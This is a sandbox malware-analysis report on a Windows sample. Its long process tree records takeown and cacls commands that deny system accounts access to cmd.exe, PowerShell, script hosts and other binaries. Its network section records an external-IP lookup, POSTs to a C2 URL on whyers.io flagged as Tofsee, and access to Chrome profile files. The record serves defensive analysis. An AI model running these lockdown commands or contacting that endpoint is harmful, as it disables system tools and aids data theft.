Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | July 18, 2023, 7:16 a.m. | July 18, 2023, 7:25 a.m. |
-
-
-
reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
2528 -
takeown.exe takeown /f C:\Windows\system32\cmd.exe /a
2572 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2620 -
cacls.exe cacls C:\Windows\system32\cmd.exe /g Administrators:f
2656 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2712 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Users:r
2748 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2804 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
2840 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2900 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d SERVICE
2936 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2992 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
3028 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2116 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d "network service"
1156 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2420 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g system:r
2500 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2560 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
2616 -
takeown.exe takeown /f C:\Windows\SysWOW64\cmd.exe /a
2648 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2704 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
2764 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2860 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
2920 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2988 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
3048 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
948 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
2404 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2432 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
416 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
748 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
2716 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2892 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
1228 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2132 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
2124 -
takeown.exe takeown /f C:\Windows\system32\net.exe /a
2600 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2728 -
cacls.exe cacls C:\Windows\system32\net.exe /g Administrators:f
2832 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2092 -
cacls.exe cacls C:\Windows\system32\net.exe /e /g Users:r
3044 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2556 -
cacls.exe cacls C:\Windows\system32\net.exe /e /g Administrators:r
2660 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
912 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d SERVICE
2612 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2676 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d mssqlserver
1072 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3020 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d "network service"
1044 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3084 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d system
3120 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3176 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
3212 -
takeown.exe takeown /f C:\Windows\SysWOW64\net.exe /a
3268 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3312 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
3348 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3404 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
3440 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3496 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
3532 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3588 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
3624 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3680 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
3716 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3772 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
3808 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3864 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d system
3900 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3956 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
3992 -
takeown.exe takeown /f C:\Windows\system32\net1.exe /a
4048 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2512 -
cacls.exe cacls C:\Windows\system32\net1.exe /g Administrators:f
3112 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3236 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /g Users:r
3324 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3420 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /g Administrators:r
3484 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3564 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d SERVICE
3620 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3696 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssqlserver
3684 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3852 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d "network service"
3892 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3988 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d system
4044 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3116 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
3188 -
takeown.exe takeown /f C:\Windows\SysWOW64\net1.exe /a
3392 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3444 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
3408 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1972 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
3760 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3876 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
3972 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3984 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
3008 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3456 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
3600 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3740 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
3812 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3104 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d system
3228 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3656 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
3536 -
takeown.exe takeown /f C:\Windows\system32\mshta.exe /a
3896 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4088 -
cacls.exe cacls C:\Windows\system32\mshta.exe /g Administrators:f
3828 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3372 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /g Users:r
3732 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3568 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
3340 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2176 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d SERVICE
4120 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4176 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
4212 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4268 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d "network service"
4304 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4360 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d system
4396 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4452 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
4488 -
takeown.exe takeown /f C:\Windows\SysWOW64\mshta.exe /a
4544 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4588 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
4624 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4680 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
4716 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4772 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
4808 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4864 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
4900 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4968 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
5004 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5060 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
5096 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4152 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d system
4196 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4280 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
4348 -
takeown.exe takeown /f C:\Windows\system32\FTP.exe /a
4432 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4504 -
cacls.exe cacls C:\Windows\system32\FTP.exe /g Administrators:f
4564 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4648 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /g Users:r
4696 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4792 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
4844 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4936 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d SERVICE
4980 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5076 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
4140 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4256 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d "network service"
4336 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4400 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d system
4492 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4592 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
4660 -
takeown.exe takeown /f C:\Windows\SysWOW64\FTP.exe /a
4884 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5036 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
5112 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5064 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
4420 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4572 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
4740 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4852 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
5052 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4320 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
4532 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4628 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
4932 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4372 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d system
4684 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5080 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
4208 -
takeown.exe takeown /f C:\Windows\system32\wscript.exe /a
4668 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4232 -
cacls.exe cacls C:\Windows\system32\wscript.exe /g Administrators:f
4296 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5164 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /g Users:r
5200 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5256 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
5292 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d SERVICE
5384 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5348 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5440 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
5476 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5532 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d "network service"
5568 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5624 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d system
5660 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5716 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
5752 -
takeown.exe takeown /f C:\Windows\SysWOW64\wscript.exe /a
5808 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5852 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
5888 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5944 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
5980 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6036 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
6072 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6128 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
4116 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5236 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
5284 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5360 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
5388 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5444 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d system
5564 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5652 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
5712 -
takeown.exe takeown /f C:\Windows\system32\cscript.exe /a
5796 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5864 -
cacls.exe cacls C:\Windows\system32\cscript.exe /g Administrators:f
5932 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6016 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /g Users:r
6064 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
5216 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6140 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5168 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d SERVICE
5436 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5544 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
5636 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5784 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d "network service"
5868 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5996 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d system
6108 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5196 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
5232 -
takeown.exe takeown /f C:\Windows\SysWOW64\cscript.exe /a
5552 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5736 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
5788 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6028 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
5160 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5452 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
5644 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5976 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
6068 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5328 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
5252 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3396 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
3180 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5132 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d system
3284 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5340 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
5812 -
takeown.exe takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
5480 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6176 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
6212 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6268 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
6304 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6360 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
6396 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6452 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
6488 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6544 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
6580 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6636 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
6672 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6732 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
6768 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6824 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
6860 -
takeown.exe takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
6916 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6960 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
6996 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7052 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
7088 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7144 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
6160 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6244 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
6300 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6372 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
6364 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6532 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
6572 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6668 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
6728 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6736 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
6884 -
takeown.exe takeown /f C:\ProgramData /a
6944 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7012 -
cacls.exe cacls C:\ProgramData /g Administrators:f
7064 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7164 -
cacls.exe cacls C:\ProgramData /e /g Users:r
6208 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6356 -
cacls.exe cacls C:\ProgramData /e /g Administrators:r
6412 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6536 -
cacls.exe cacls C:\ProgramData /e /d SERVICE
6648 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6788 -
cacls.exe cacls C:\ProgramData /e /d mssqlserver
6852 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6992 -
cacls.exe cacls C:\ProgramData /e /d "network service"
7112 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6264 -
cacls.exe cacls C:\ProgramData /e /d system
6336 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6448 -
cacls.exe cacls C:\ProgramData /e /d mssql$sqlexpress
6692 -
takeown.exe takeown /f C:\Users\Public /a
6908 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7040 -
cacls.exe cacls C:\Users\Public /g Administrators:f
2012 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6524 -
cacls.exe cacls C:\Users\Public /e /g Users:r
6700 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6972 -
cacls.exe cacls C:\Users\Public /e /g Administrators:r
6340 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6632 -
cacls.exe cacls C:\Users\Public /e /d SERVICE
6804 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6600 -
cacls.exe cacls C:\Users\Public /e /d mssqlserver
7048 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7196 -
cacls.exe cacls C:\Users\Public /e /d "network service"
7232 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7288 -
cacls.exe cacls C:\Users\Public /e /d system
7324 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7380 -
cacls.exe cacls C:\Users\Public /e /d mssql$sqlexpress
7416
-
-
AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
7492
-
Name | Response | Post-Analysis Lookup |
---|---|---|
whyers.io | 172.67.191.103 | |
api.ipify.org |
CNAME
api4.ipify.org
|
64.185.227.156 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49509 -> 104.21.76.77:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49508 -> 173.231.16.76:80 | 2021997 | ET POLICY External IP Lookup api.ipify.org | Device Retrieving External IP Address Detected |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49509 104.21.76.77:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=whyers.io | b5:70:31:dc:b0:cd:7d:e9:af:71:21:ec:4b:e6:97:ce:e4:da:a6:57 |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://api.ipify.org/ | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST https://whyers.io/QWEwqdsvsf/ap.php |
request | GET http://api.ipify.org/ |
request | POST https://whyers.io/QWEwqdsvsf/ap.php |
request | POST https://whyers.io/QWEwqdsvsf/ap.php |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\index-dir |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Origin Bound Certs |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm |
